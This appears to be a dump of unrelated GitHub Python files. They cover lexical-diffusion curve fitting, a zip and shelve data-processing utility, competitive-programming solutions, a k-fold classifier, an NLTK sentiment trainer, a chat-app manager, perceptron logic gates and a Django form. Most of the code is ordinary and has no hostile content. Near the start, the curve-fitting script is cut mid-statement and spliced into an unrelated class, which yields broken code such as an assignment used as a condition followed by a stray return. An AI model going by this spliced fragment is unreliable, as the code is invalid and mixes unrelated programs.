df_5years.copy()\n\n# We add for all forms a first month at 0.\ndf_5years = df_5years.rename(columns={str(e):str(int(e)+1) for e in range(60)})\ndf_5years.insert(loc=0,column=\"0\",value=0.0)\ndf_5years_rel = df_5years_rel.rename(columns={str(e):str(int(e)+1) for e in range(60)})\ndf_5years_rel.insert(loc=0,column=\"0\",value=0.0)\n\n# We divide tokens according to whether they are hashtags, words, symbols or other.\nhashtags = df_5years[df_5years.index.str.startswith(\"#\")]\nsymb = df_5years[df_5years.index.str.contains(r\"^\\W+$\")]\nwords = df_5years[df_5years.index.str.contains(r\"^(\\w|-|')+$\")]\nothers = df_5years[(~df_5years.index.isin(hashtags)) & (~df_5years.index.isin(symb)) & (~df_5years.index.isin(words))]\n\nlogger.info(str(len(words))+\" words (any sequence of alpha-numeric characters, which may contain an apostrophe or a dash).\")\n\n# curve fitting function from a reference function (logNormal or logistic)\nlogNormal_model = LognormalModel()\nlogistic_model=StepModel(form='logistic')\ndef fit(form, log=False) : \n \n x = [i for i in range(61)]\n y=df_5years_rel.loc[form].rolling(window=3, min_periods=0).mean()\n \n if log :\n\n params=logistic_model.guess(y, x=x)\n model = logistic_model \n \n else :\n params=logNormal_model.guess(y, x=x)\n params.add(\"sigma\", value=2)\n model = logNormal_model \n \n result = model.fit(y, params, x=x)\n\n if log : \n\n return {'form':form,\n 'sigma':result.params['sigma'].value,\n 'sigma_err':result.params['sigma'].stderr,\n 'center':result.params['center'].value,\n 'center_err':result.params['center'].stderr,\n 
'amplitude':result.params['amplitude'].value,\n                'amplitude_err':result.params['amplitude'].stderr, \n                'redchi':result.redchi,\n                'chisqr':result.chisqr}\n\n    else : \n        maxPoint = np.where(result.best_fit==np.max(result.best_fit))[0][0]\n        return {'form':form,\n                'sigma':result.params['sigma'].value,\n                'sigma_err':result.params['sigma'].stderr,\n                'center':result.params['center'].value,\n                'center_err':result.params['center'].stderr,\n                'amplitude':result.params['amplitude'].value,\n                'amplitude_err':result.params['amplitude'].stderr,\n                'height':result.params['height'].value,\n                'height_err':result.params['height'].stderr,\n                'fwhm':result.params['fwhm'].value,\n                'fwhm_err':result.params['fwhm'].stderr,\n                'redchi':result.redchi,\n                'chisqr':result.chisqr,\n                'maxPoint':maxPoint}\n\n# return the diffusion phases of a word\ndef phases_delimitation(form, log=False) : \n    \n    x = [i for i in range(61)]\n    y=df_5years_rel.loc[form].rolling(window=3, min_periods=0).mean()\n    \n    if log :\n\n        params=logistic_model.guess(y, x=x)\n        model = logistic_model \n    \n    else :\n        params=logNormal_model.guess(y, x=x)\n        params.add(\"sigma\", value=2)\n        model = logNormal_model \n    \n    result = model.fit(y, params, x=x)\n\n    # detection of diffusion phases\n    def f(x) : \n        ampl = result.params['amplitude'].value\n        sigma = result.params['sigma'].value\n        center = result.params['center'].value \n        if log : \n            return ampl*(1-(1/(1+math.exp((x-center)/sigma))))\n        else : \n            return (ampl/(sigma*math.sqrt(2*math.pi)))*((math.exp(-((math.log(x)-center)**2/(2*sigma**2))))/x)\n\n    maxPoint = np.where(result.best_fit==np.max(result.best_fit))[0][0]\n\n    values_deriv_3 = []\n    if log : \n        for x2 in range(0,61) : \n            values_deriv_3.append(derivative(f, x2, n=3, order=5, dx=1))\n    else : \n        values_deriv_3=[0]\n        for x2 in range(1,61) : \n            values_deriv_3.append(derivative(f, x2, n=3, order=5, dx=0.1))\n\n    periods = {\"innovation\":(min(x), values_deriv_3.index(max(values_deriv_3[:values_deriv_3.index(min(values_deriv_3))]))), \n               \"propagation\":(values_deriv_3.index(max(values_deriv_3[:values_deriv_3.index(min(values_deriv_3))])), values_deriv_3.index(max(values_deriv_3[values_deriv_3.index(min(values_deriv_3)):]))),\n               \"fixation\":(values_deriv_3.index(max(values_deriv_3[values_deriv_3.index(min(values_deriv_3)):])), max(x))}\n\n    return (form,periods)\n\npool = Pool()\n\n# We retrieve the results of the curve fitting for the two reference functions: logistic and logNormal, for all new tokens identified as words\nlmfit_results = pool.map(partial(fit, log=True), words.index.tolist())\ndf_log = pd.DataFrame.from_records(lmfit_results, index=\"form\")\ndf_log.to_csv(path_out+\"05_lmfit_logistic_words.csv\")\n\nlmfit_results = pool.map(partial(fit, log=False), words.index.tolist())\ndf_logNorm= pd.DataFrame.from_records(lmfit_results, index=\"form\")\ndf_logNorm.to_csv(path_out+\"05_lmfit_logNorm_words.csv\")\n\nlogger.info(\"Fitting the curves for the new words to the two reference functions: logistic and logNormal - ended.\")\nlogger.info(\"Saving the results of these fits in the files \"+path_out+\"05_lmfit_logistic_words.csv and \"+path_out+\"05_lmfit_logNorm_words.csv.\")\n\nlogger.info(\"Categorization of words as change or buzz.\")\n# We only select words used by at least 200 users.\ndf = df_5years[df_5years.nbUsers_period>=200]\ndf_log_min200 = df_log[df_log.index.isin(df.index)]\ndf_logNorm_min200 = df_logNorm[df_logNorm.index.isin(df.index)]\n\n# Sorting on the output parameters of the logistic and lognormal curve fit\nlogNorm_select = 
df_logNorm_min200[(df_logNorm_min200.fwhm>=4) & (df_logNorm_min200.fwhm<=40) & (df_logNorm_min200.redchi<=0.00005) & (df_logNorm_min200.amplitude<=1.1) & (df_logNorm_min200.maxPoint>=21) & (df_logNorm_min200.maxPoint<=46) & (((df_logNorm_min200.center<=3.6) & (df_logNorm_min200.sigma<=0.65)) | ((df_logNorm_min200.center>3.6) & (df_logNorm_min200.center<=3.8) & (df_logNorm_min200.sigma<=0.35)) | ((df_logNorm_min200.center>3.8) & (df_logNorm_min200.sigma<=0.15)))]\nlogistic_select = df_log_min200[(((df_log_min200.center>=16) & (df_log_min200.center<=31) & (df_log_min200.sigma<=8)) | ((df_log_min200.center>31) & (df_log_min200.center<=46) & (df_log_min200.sigma<=7))) & (df_log_min200.redchi<0.00005) & (df_log_min200.amplitude>0.02) & (df_log_min200.center_err<5)]\n\nlogger.info(\"Categorization of words as change or buzz - ended.\")\n\n# to treat the possible cases where a word is classified in both categories\nfor form in logistic_select.index : \n    if form in logNorm_select.index : \n        if logistic_select.loc[form,\"redchi\"]= 5:\n            break\n\n        return data_vi\n\n\nclass ZipUnpacker(Unpacker, Fabricator):\n\n\n    @classmethod\n    def _is_check_for(cls, check):\n        return check == '.zip'\n    \n    def unpack(self):\n\n        with ZipFile(self.in_path, 'r') as g:\n            inside = g.infolist()\n            for ig in inside:\n                try:\n                    g.extract(ig, self.out_path)\n                    print('{} ... unpacked'.format(ig))\n                except BadZipfile:\n                    print('{} ... wrong file'.format(ig))\n\n    def pack(self):\n        pass\n\n\nclass ShelveDumper(Dumper, Fabricator):\n\n\n    @classmethod\n    def _is_check_for(cls, check):\n        return check == 'shelve'\n\n    def dump(self):\n\n        with shelve.open(self.out_path) as s:\n            for k, v in enumerate(self.dump_list):\n                try:\n                    s[str(k)] = v\n                    print('Object {0} is dumped to \"{1}\" objects'.format(k, self.out_path))\n                except TypeError:\n                    print('Object {0} not dumped - an error occurred'.format(k))\n\n\nclass ShelveUndumper(Undumper, Fabricator):\n\n\n    @classmethod\n    def _is_check_for(cls, check):\n        return check == 'shelve'\n\n    def undump(self):\n\n        dict_of_objects = {}\n        with shelve.open(self.out_path) as o:\n            for k, v in o.items():\n                dict_of_objects[k] = v\n        return dict_of_objects.values()\n\n\nclass Processor:\n\n    \"\"\"Class provides methods for operations over data and files\n\n    Available:\n    - create source tree for folder\n    - read and display file content\n    - load file to DataFrame\n    - unpack file\n    - serialize data\n    - unserialize data\n    \"\"\"\n\n    @staticmethod\n    def _rjpath(path_, slack):\n\n        \"\"\"Make realpath\n\n        Returns:\n            str: path\n        \"\"\"\n\n        return os.path.realpath(os.path.join(path_, slack))\n\n    @staticmethod\n    def _extention(in_path):\n\n        \"\"\"Make file extension string\n\n        Returns:\n            str: extension\n        \"\"\"\n\n        return os.path.splitext(in_path)[1]\n\n    @staticmethod\n    def _check_the_input(check, method):\n\n        \"\"\"Check:\n        - whether the current class method has the same name as the called class method\n        - whether the checked file extension is defined for the called method\n\n        Returns:\n            cls: cls if both conditions are True\n        \"\"\"\n\n        for cls_ in Fabricator.__subclasses__():\n            method_list = [func for func in dir(cls_) if callable(getattr(cls_, func)) and not func.startswith(\"__\")]\n            if method in method_list and cls_._is_check_for(check):\n                return cls_\n        try:\n            raise ValueError\n        except ValueError:\n            print('Extension {0} is wrong! 
Choose another file'.format(check))\n\n    @staticmethod\n    def _sourcer(path_, inslack, _s_tree, _prefix=''):\n\n        \"\"\"Look for source tree and make dict, where keys are file or directory name,\n        values are path to file or directory\n        \"\"\"\n\n        names = os.listdir(path_)\n        s_path = os.path.realpath(path_)\n\n        for name in names:\n            fullpath = os.path.join(s_path, name)\n            if os.path.isfile(fullpath):\n                _s_tree[_prefix + name] = fullpath\n            elif os.path.isdir(fullpath):\n                Processor._sourcer(os.path.join(path_, name), inslack, _s_tree, _prefix + name + '/')\n\n        return _s_tree\n    \n    def source(self, path_=core_paths.DATA_PATH, inslack=''):\n\n        \"\"\"Print source tree\n        \"\"\"\n\n        _s_tree = {}\n        _s_tree = self._sourcer(path_, inslack, _s_tree)\n\n        print('File .... full path:')\n        for key, val in _s_tree.items():\n            print('{0} ..... {1}'.format(key, val))\n\n    def view(self, path_=core_paths.DATA_PATH, inslack='', encoding=None):\n\n        \"\"\"Read and display file\n\n        Now available:\n        - csv\n\n        path_:\n            Base placement of data files\n            string: default core_paths.DATA_PATH constant\n\n        inslack:\n            Part of file path, looks like this/that.csv\n            string: default ''\n\n        encoding: \n            Encoding to use for UTF when reading/writing (ex. ‘utf-8’)\n            str: default None\n\n        Returns:\n            str: top 5 strings of file\n        \"\"\"\n\n        index_col=None\n        dtype=None\n        parse_dates=None\n        sep=None\n        in_path = self._rjpath(path_, inslack)\n        process = self._extention(in_path)\n        process = self._check_the_input(process, inspect.stack()[0][3])\n        if process:\n            return process(in_path, index_col, dtype, parse_dates, sep, encoding).view()\n\n    def load(self, path_=core_paths.DATA_PATH, inslack='', index_col=None, dtype=None, parse_dates=False, sep=',', encoding=None):\n\n        \"\"\"Read file and return pandas dataframe\n\n        Now available:\n        - csv\n\n        path_:\n            Base placement of data files\n            string: default core_paths.DATA_PATH constant\n\n        inslack:\n            Part of file path, looks like this/that.csv\n            string: default ''\n\n        index_col:\n            Column to use as the row labels of the DataFrame, either given as string name or column index.\n            If a sequence of int/str is given, a MultiIndex is used.\n            Note: index_col=False can be used to force pandas to not use the first column as the index, e.g. when \n            you have a malformed file with delimiters at the end of each line.\n            int, str, sequence of int/str, or False: default None\n\n        dtype: \n            Data type for data or columns. E.g. {‘a’: np.float64, ‘b’: np.int32, ‘c’: ‘Int64’}\n            Use str or object together with suitable na_values settings to preserve and not interpret dtype.\n            If converters are specified, they will be applied INSTEAD of dtype conversion\n            As example looks like 'dtype': {'assigned_day': np.float64}\n            dict: default None\n\n        parse_dates:\n            Parse column as datetime format\n            If True -> try parsing the index.\n            List of int or names. e.g. If [1, 2, 3] -> try parsing columns 1, 2, 3 each as a separate date column.\n            List of lists. e.g. If [[1, 3]] -> combine columns 1 and 3 and parse as a single date column.\n            Dict, e.g. 
{‘foo’ : [1, 3]} -> parse columns 1, 3 as date and call result ‘foo’\n            More information [pandas.read_csv](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html)\n            If a column or index cannot be represented as an array of datetimes, \n            say because of an unparseable value or a mixture of timezones, the column \n            or index will be returned unaltered as an object data type.\n            bool or list of int or names or list of lists or dict: default False\n\n        sep:\n            Delimiter to use\n            string: default ','\n\n        encoding: \n            Encoding to use for UTF when reading/writing (ex. ‘utf-8’)\n            str: default None\n\n        Returns:\n            obj: Pandas DataFrame object\n        \"\"\"\n\n        in_path = self._rjpath(path_, inslack)\n        process = self._extention(in_path)\n        process = self._check_the_input(process, inspect.stack()[0][3])\n        if process:\n            return process(in_path, index_col, dtype, parse_dates, sep, encoding).load()\n\n    def save(self):\n        pass\n\n    def pack(self):\n        pass\n\n    def unpack(self, path_=core_paths.DATA_PATH, inslack='', outslack=''):\n\n        \"\"\"Unpack and extract file to target folder\n\n        Now available:\n        - zip\n\n        path_:\n            Base placement of data files\n            string: default core_paths.DATA_PATH\n\n        inslack:\n            Part of file path, looks like this/that.zip\n            string: default ''\n\n        outslack:\n            Part of folder path, looks like thisfolder\n            string: default ''\n        \"\"\"\n\n        in_path = self._rjpath(path_, inslack)\n        out_path = self._rjpath(path_, outslack)\n        process = self._extention(in_path)\n        process = self._check_the_input(process, inspect.stack()[0][3])\n        if process:\n            process(in_path, out_path).unpack()\n\n    def dump(self, path_=core_paths.DATA_PATH, inslack='', outslack='', dump_list=None, method='shelve'):\n\n        \"\"\"Save data with serialise tools\n\n        Now available:\n        - shelve\n\n        path_:\n            Base placement of data files\n            string: default core_paths.DATA_PATH\n\n        inslack:\n            Part of dumped file path, looks like thisisnameoffile\n            string: default ''\n\n        outslack:\n            Part of undumped structure path, looks like thisisnameoffile\n            string: default ''\n\n        dump_list: \n            List or tuple with objects for saving\n            list, tuple: default None\n\n        method:\n            Method of serialisation\n            string: default 'shelve'\n        \"\"\"\n\n        in_path = self._rjpath(path_, inslack)\n        out_path = self._rjpath(path_, outslack)\n        process = self._check_the_input(method, inspect.stack()[0][3])\n        if process:\n            process(in_path, out_path, dump_list).dump()\n\n    def undump(self, path_=core_paths.DATA_PATH, outslack='', method='shelve'):\n\n        \"\"\"Load data with serialise tools\n\n        Now available:\n        - shelve\n\n        path_:\n            Base placement of data files\n            string: default core_paths.DATA_PATH\n\n        outslack:\n            Part of output structure path, looks like thisisnameoffile\n            string: default ''\n\n        dump_list: \n            List or tuple with objects for saving\n            list, tuple: default None\n\n        method:\n            Method of serialisation\n            string: default 'shelve'\n        \"\"\"\n\n        out_path = self._rjpath(path_, outslack)\n        process = self._check_the_input(method, inspect.stack()[0][3])\n        if process:\n            return process(out_path).undump()\n\n\nif __name__ == \"__main__\":\n    \n    pro = Processor()\n    pro.source(path_=core_paths.DATA_PATH_TEST)\n    print('source.... ok')\n    print('.' * 100)\n\n    loaded = pro.view(path_=core_paths.DATA_PATH_TEST, inslack='titanic.csv')\n    if loaded:\n        print(loaded)\n        print('view correct .... ok')\n        print('.' * 100)\n\n    loaded = pro.load(path_=core_paths.DATA_PATH_TEST, inslack='titanic.csv')\n    if isinstance(loaded, pd.DataFrame):\n        print(loaded.head(1))\n        print('load correct .... 
ok')\n print('.' * 100)\n else:\n print('load correct.... None')\n print('.' * 100)\n\n pro.load(path_=core_paths.DATA_PATH_TEST, inslack='wrong_extention.sdv')\n print('load wrong .... ok')\n print('.' * 100)\n\n pro.unpack(path_=core_paths.DATA_PATH_TEST, inslack='titanic.zip', outslack=core_paths.DATA_OUTPUT_TEST)\n print('unpack correct .... ok')\n print('.' * 100)\n\n pro.unpack(path_=core_paths.DATA_PATH_TEST, inslack='wrong_extention.sdv', outslack=core_paths.DATA_OUTPUT_TEST)\n print('unpack wrong .... ok')\n print('.' * 100)\n\n pro.dump(path_=core_paths.DUMP_PATH_TEST, dump_list=[loaded])\n print('dump save .... ok')\n print('.' * 100)\n\n loaded, = pro.undump(path_=core_paths.DUMP_PATH_TEST)\n if isinstance(loaded, pd.DataFrame):\n print(loaded.head(1))\n print('dump load .... ok')\n print('.' * 100)\n else:\n print('dump load .... None')\n print('.' * 100)\n ","repo_name":"KonstantinKlepikov/ml_support","sub_path":"ml_support/data_obs.py","file_name":"data_obs.py","file_ext":"py","file_size_in_byte":13919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5562788825","text":"class Solution(object):\n def distributeCandies(self, candies):\n \"\"\"\n :type candies: List[int]\n :rtype: int\n \"\"\"\n temp = []\n l = len(candies)\n for i in range(l):\n if(candies[i] not in temp):\n temp.append(candies[i])\n if(len(temp) == l/2):\n return l/2\n return len(temp)","repo_name":"ArenS2/LeetC0D3","sub_path":"code/ID575.py","file_name":"ID575.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"34667044692","text":"import sys, math\r\nlines = list(map(str.strip, sys.stdin.readlines()))\r\n\r\nfor i in range(1, len(lines), 2):\r\n n, k = map(int, lines[i].split(\" \"))\r\n k += 1\r\n nums = list(map(int, lines[i+1].split(\" \")))\r\n nums = list(map(math.log2, nums))\r\n for i in range(len(nums)):\r\n nums[i] += i + 1\r\n bad_pairs = {}\r\n for i in range(len(nums) - 1):\r\n if nums[i+1] <= nums[i]:\r\n bad_pairs[i] = i+1\r\n curr_bad = set()\r\n for i in range(k-1):\r\n if i in bad_pairs:\r\n curr_bad.add(i)\r\n result = 0\r\n a = 0\r\n b = k-1\r\n while b < len(nums):\r\n # print(a, b, curr_bad)\r\n if not curr_bad:\r\n result += 1\r\n if a in curr_bad:\r\n curr_bad.remove(a)\r\n if b in bad_pairs:\r\n curr_bad.add(b)\r\n a+=1\r\n b+=1\r\n print(result)\r\n # print(nums)\r\n # print(bad_pairs)\r\n # print()","repo_name":"tomasnyberg/cp_notebook","sub_path":"codeforces/1692/1692G.py","file_name":"1692G.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26807287098","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 2 21:44:06 2022\n\n@author: jose\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom chip import chip\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import accuracy_score\n\n# read\ndata = pd.read_csv('data/glass.data', header = None).values\n\nX = data[:, 1:-1]\ny = data[:, -1]\n\n# kfold\nk = 10\nsize = len(data)\nindex = list(range(size))\nnp.random.shuffle(index)\nstep = round(size / k)\nkfolds = [index[i:i+step] for i in range(0, size, step)]\n\nlog = []\nfor k, kfold in enumerate(kfolds):\n if k==10:\n continue\n fold = np.ones(size, bool)\n fold[kfold] = False\n \n X_test = X[np.invert(fold), :]\n X_train = X[fold, :]\n y_test = 
y[np.invert(fold)]\n y_train = y[fold]\n \n # norm\n scaler = StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n \n # chip\n chipclass = chip()\n chipclass.fit(X_train, y_train)\n y_hat = chipclass.predict(scaler.transform(X_test))\n log.append(accuracy_score(y_test, y_hat))\nprint(np.mean(log), np.std(log))\n","repo_name":"josegfer/rp-20221","sub_path":"ap3/glass.py","file_name":"glass.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"14340371892","text":"import logging\nimport os\nimport pickle\nimport random\nimport re\n\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\n\nclassifier = None\nword_features = None\n\n\ndef get_classifier():\n global classifier\n return classifier\n\n\ndef deserialize_model():\n global classifier\n global word_features\n\n classifier_f = open(\"./models/naivebayes.pickle\", \"rb\")\n classifier = pickle.load(classifier_f)\n classifier_f.close()\n\n features_f = open(\"./models/features.pickle\", \"rb\")\n word_features = pickle.load(features_f)\n features_f.close()\n\n\ndef train_model(train_dir, app):\n global classifier\n global word_features\n\n with app.app_context():\n try:\n perc_data = app.config['SENTIMENT_PERC_DATA']\n except Exception:\n perc_data = 1\n\n logging.debug('[SENTIMENT] Training sentiment classifier')\n\n logging.debug('[SENTIMENT] (1/6) Loading bag of words')\n all_words, documents = load_words(train_dir, perc_data)\n\n logging.debug('[SENTIMENT] (2/6) Obtaining frequency distribution of each adjective')\n all_words = nltk.FreqDist(all_words)\n word_features = list(all_words.keys())[:5000]\n\n logging.debug('[SENTIMENT] (3/6) Creating features for each review')\n feature_sets = [(find_features(rev), category) for (rev, category) in documents]\n\n logging.debug('[SENTIMENT] (4/6) Shuffling the documents')\n random.shuffle(feature_sets)\n\n logging.debug('[SENTIMENT] (5/6) Partitioning training and testing sets')\n partition_idx = int(len(feature_sets) * (4 / 5))\n training_set = feature_sets[:partition_idx]\n testing_set = feature_sets[partition_idx:]\n\n logging.debug('[SENTIMENT] (6/6) Preparing Naive Bayes classifier')\n classifier = nltk.NaiveBayesClassifier.train(training_set)\n logging.debug('[SENTIMENT] Classifier training accuracy: ' + str(\n (nltk.classify.accuracy(classifier, training_set)) * 100) + '%')\n logging.debug('[SENTIMENT] Classifier validation accuracy: ' + str(\n (nltk.classify.accuracy(classifier, testing_set)) * 100) + '%')\n\n # Serialize model\n try:\n if not os.path.exists('./models'):\n os.makedirs('./models')\n save_classifier = open(\"./models/naivebayes.pickle\", \"wb\")\n pickle.dump(classifier, save_classifier)\n save_classifier.close()\n\n save_features = open(\"./models/features.pickle\", \"wb\")\n pickle.dump(word_features, save_features)\n save_features.close()\n except OSError as e:\n logging.error(\"Unable to serialize Naive Bayes model! 
Classifier available but only in memory.\", e)\n    # Custom method to see n most informative features as a Python list\n    # pos, neg = show_most_informative_features_in_list(classifier, 100)\n    logging.info(\"Sentiment classifier ready!\")\n\n\ndef load_words(train_dir, perc_data):\n    all_words = []\n    documents = []\n    # Load adjectives, this has shown the highest accuracy\n    allowed_word_types = [\"J\"]\n\n    stop_words = list(set(stopwords.words('english')))\n\n    files_pos = os.listdir(train_dir + '/positive')\n    files_pos = [open(train_dir + '/positive/' + f, 'r').read() for f in files_pos]\n    files_neg = os.listdir(train_dir + '/negative')\n    files_neg = [open(train_dir + '/negative/' + f, 'r').read() for f in files_neg]\n\n    logging.debug('[SENTIMENT] Loading %.2f%% of training set. (%d documents)',\n                  perc_data * 100, int(len(files_pos) * perc_data))\n\n    files_pos = files_pos[:int(len(files_pos) * perc_data)]\n    files_neg = files_neg[:int(len(files_neg) * perc_data)]\n\n    logging.debug('[SENTIMENT] Loaded training set. Tokenizing positive reviews.')\n\n    all_pos = []\n    for p in files_pos:\n        # create a list of tuples where the first element of each tuple is a review\n        # the second element is the label\n        documents.append((p, \"pos\"))\n\n        # remove punctuations\n        cleaned = re.sub(r'[^(a-zA-Z)\\s]', '', p)\n\n        # tokenize\n        tokenized = word_tokenize(cleaned)\n\n        # remove stopwords\n        stopped = [w for w in tokenized if w not in stop_words]\n\n        # parts of speech tagging for each word\n        pos = nltk.pos_tag(stopped)\n\n        all_pos += pos\n\n        # make a list of all adjectives identified by the allowed word types list above\n        for w in pos:\n            if w[1][0] in allowed_word_types:\n                all_words.append(w[0].lower())\n\n    # get word cloud\n    all_pos = [x[0] for x in all_pos]\n    # TODO for word cloud\n\n    logging.debug('[SENTIMENT] Tokenizing negative reviews.')\n\n    all_neg = []\n    for p in files_neg:\n        # create a list of tuples where the first element of each tuple is a review\n        # the second element is the label\n        documents.append((p, \"neg\"))\n\n        # remove punctuations\n        cleaned = re.sub(r'[^(a-zA-Z)\\s]', '', p)\n\n        # tokenize\n        tokenized = word_tokenize(cleaned)\n\n        # remove stopwords\n        stopped = [w for w in tokenized if w not in stop_words]\n\n        # parts of speech tagging for each word\n        neg = nltk.pos_tag(stopped)\n\n        all_neg += neg\n\n        # make a list of all adjectives identified by the allowed word types list above\n        for w in neg:\n            if w[1][0] in allowed_word_types:\n                all_words.append(w[0].lower())\n\n    # get word cloud\n    all_neg = [x[0] for x in all_neg]\n    # TODO this is for word cloud\n\n    return all_words, documents\n\n\ndef find_features(document):\n    global word_features\n\n    words = word_tokenize(document)\n    features = {}\n    for w in word_features:\n        features[w] = (w in words)\n    return features\n\n\ndef show_most_informative_features_in_list(classifier, n=10):\n    \"\"\"\n    Return a nested list of the \"most informative\" features\n    used by the classifier along with its predominant labels\n    \"\"\"\n    cpdist = classifier._feature_probdist # probability distribution for feature values given labels\n    feature_list = []\n    pos_dict = {}\n    neg_dict = {}\n    for (fname, fval) in classifier.most_informative_features(n):\n        def labelprob(l):\n            return cpdist[l, fname].prob(fval)\n\n        labels = sorted([l for l in classifier._labels if fval in cpdist[l, fname].samples()],\n                        key=labelprob)\n        ratio = labelprob(labels[1]) / labelprob(labels[0])\n        feature_list.append([fname, labels[-1], ratio])\n        if labels[-1] == \"pos\":\n            pos_dict[fname] = ratio\n        elif 
labels[-1] == \"neg\":\n neg_dict[fname] = ratio\n return pos_dict, neg_dict\n\n\ndef classify(text):\n global classifier\n\n if classifier is not None:\n features = find_features(text)\n return classifier.classify(features)\n","repo_name":"DavidBakerEffendi/providentia","sub_path":"providentia-flask/providentia/classifier/sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":6732,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"4866788988","text":"import numpy as np\n\ninputData = np.array([[0,0],[0,1],[1,0],[1,1]])\n\ndef nandPerceptron(x1, x2):\n w1, w2, theta= -0.5, -0.5, -0.7\n netInput = x1*w1 + x2*w2\n if netInput <= theta:\n return 0\n elif netInput > theta:\n return 1\n\ndef orPerceptron(x1, x2):\n w1, w2, bias = 0.5, 0.5, -0.2\n netInput = x1*w1 + x2*w2 + bias\n if netInput <= 0:\n return 0\n else:\n return 1 \n\ndef andPerceptron(x1, x2):\n w1, w2, theta = 0.6, 0.6, 1\n netInput = x1*w1 + x2*w2\n if netInput <= theta:\n return 0\n elif netInput > theta:\n return 1\n\nprint(\"---And Perceptron---\")\nfor xs1 in inputData:\n print(str(xs1) + \" ==> \" + str(andPerceptron(xs1[0], xs1[1])))\n\nprint(\"---or Perceptron---\") \nfor xs1 in inputData:\n print(str(xs1) + \" ==> \" + str(orPerceptron(xs1[0], xs1[1])))\n\nprint(\"---nand Perceptron---\") \nfor xs1 in inputData:\n print(str(xs1) + \" ==> \" + str(nandPerceptron(xs1[0], xs1[1])))\n\n\ndef xorPerceptron(x1, x2):\n s1 = nandPerceptron(x1, x2)\n s2 = orPerceptron(x1, x2)\n y = andPerceptron(s1, s2)\n return y\n\ninputData = np.array([[0,0],[0,1],[1,0],[1,1]])\n\nprint(\"---xor Perceptron---\")\n\nfor xs4 in inputData:\n print(str(xs4) + \" ==> \" + str(xorPerceptron(xs4[0], xs4[1])))","repo_name":"saehan-choi/Fancy","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"38897605166","text":"class UserAlreadyExistError(Exception):\n\n def __init__(self, message):\n super().__init__(message)\n\n\nclass ChatApplicationManager(object):\n conversation_identifier = 1\n\n def __init__(self):\n self._online_users = []\n self._handlers = []\n self._conversation_pairs = {}\n self._conversation = {}\n\n def register_user(self, user, handler):\n for u in self._online_users:\n if user[\"user_id\"] == u[\"user_id\"]:\n print(\"User Already Exist\")\n raise UserAlreadyExistError(\"User Already Exist\")\n else:\n user_info = dict()\n user_info[\"user_id\"] = user[\"user_id\"]\n user_info[\"username\"] = user[\"user_name\"]\n self._online_users.append(user_info)\n\n handler_info = dict()\n handler_info[user[\"user_id\"]] = handler\n self._handlers.append(handler_info)\n print(\"User registered successfully\")\n\n def get_registered_users(self):\n return self._online_users, self._handlers\n\n def get_user_handler(self, user_id=None):\n for h in self._handlers:\n for k, v in h.items():\n if user_id == k:\n return v\n\n def de_register_user(self, handler):\n user_id = None\n for u in self._handlers:\n for k, v in u.items():\n if v == handler:\n user_id = k\n break\n\n for i, u in enumerate(self._online_users):\n if u[\"user_id\"] == user_id:\n self._online_users.pop(i)\n\n def get_conversation_id(self, pair):\n is_pair_exist = pair in self._conversation_pairs.values() or pair[::-1] in self._conversation_pairs.values()\n print(is_pair_exist)\n conversation_id = None\n if is_pair_exist:\n for k, v in 
self._conversation_pairs.items():\n if v == pair or v == pair[::-1]:\n conversation_id = k\n break\n else:\n temp = ChatApplicationManager.conversation_identifier + 1\n self._conversation_pairs[temp] = pair\n conversation_id = temp\n ChatApplicationManager.conversation_identifier = temp\n return conversation_id\n\n def get_user_name_by_id(self, user_id):\n for u in self._online_users:\n for k, v in u.items():\n if k == \"user_id\" and u[\"user_id\"] == user_id:\n return u[\"username\"]\n\n def get_conversation_by_id(self, conversation_id):\n if conversation_id in self._conversation.keys():\n return self._conversation[conversation_id]\n else:\n return []\n\n def add_message_to_conversation(self, message):\n pair = (message[\"msg_from\"], message[\"msg_to\"])\n conversation_id = self.get_conversation_id(pair)\n if conversation_id in self._conversation.keys():\n print(\"----STEP-2--------\")\n self._conversation[conversation_id].append(message)\n else:\n print(\"------STEP-1----------\")\n self._conversation[conversation_id] = [message]\n print(self._conversation)\n return conversation_id\n\n\n\n\n\n\n","repo_name":"punithkravi007/chatapp-python-tornado","sub_path":"chat_app/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"8628178322","text":"from django import forms\nfrom .models import Perro\nfrom django.contrib.auth.models import User\n\nclass PerroForm(forms.ModelForm):\n \n def __init__(self, *args, **kwargs):\n super(PerroForm, self).__init__(*args, **kwargs)\n #print (kwargs)\n\n class Meta:\n model = Perro\n\n fields = ['usuario', 'nombre', 'nacimiento', 'provincia', 'sexo', 'color', 'raza', 'size', 'foto', 'link', 'descripcion']\n #Definimos los campos extendidos que usará el formulario\n widgets = {\n 'usuario': forms.TextInput(attrs={'readonly': True}),\n 'foto': forms.ClearableFileInput(attrs={'class':'form-control-file mt-3'}),\n 'color': forms.TextInput(attrs={'placeholder':'Color'}), \n 'raza': forms.TextInput(attrs={'placeholder':'Raza'}), \n 'link': forms.TextInput(attrs={'class':'form-control', 'placeholder':'Enlace mas informacion'}), \n 'descripcion': forms.Textarea(attrs={'class':'form-control'}),\n }\n labels = {\n 'nombre': '', 'descripcion':'Descripción:', 'link':''\n 